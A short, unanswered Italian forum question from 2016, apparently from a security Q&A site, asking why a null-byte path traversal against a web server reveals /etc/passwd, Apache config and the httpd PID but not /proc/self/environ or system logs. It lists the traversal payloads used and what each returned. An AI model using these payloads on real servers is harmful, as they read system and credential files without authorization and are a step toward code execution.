Perchè / proc / self / environ nessun output attraverso l'iniezione

0

Cosa farebbe su una macchina per interrompere un'iniezione di byte null visualizzando l'output di /proc/self/environ e /proc/$PID/environ o /proc/$PID/fd/12 ?

In base a questo articolo, tutte le cartelle in /proc dovrebbero avere le autorizzazioni per l'utente che esegue il servizio ... quindi l'iniezione tramite byte null avviene sotto l'utente www-data corretta?

Output visibili visualizzati su

../../../../../../etc/passwd%00    {output passwd file}
../../../../../../etc/httpd/conf/httpd.conf%00  {output apache config}
../../../../../../etc/httpd/run/httpd.pid%00   {PID of httpd process}
../../../../../../proc/$PID/cmdline%00  {cmd line executed to run httpd}
../../../../../../etc/ssh/ssh_config%00  {ssh config file}

Non riceve l'output da:

../../../../../../var/log/messages%00
../../../../../../var/log/secure%00
../../../../../../proc/self/environ%00
../../../../../../proc/$PID/environ%00

Qualche consiglio sarebbe fantastico.

    
posta Dusty Boshoff 28.04.2016 - 13:59
fonte

0 risposte

Leggi altre domande sui tag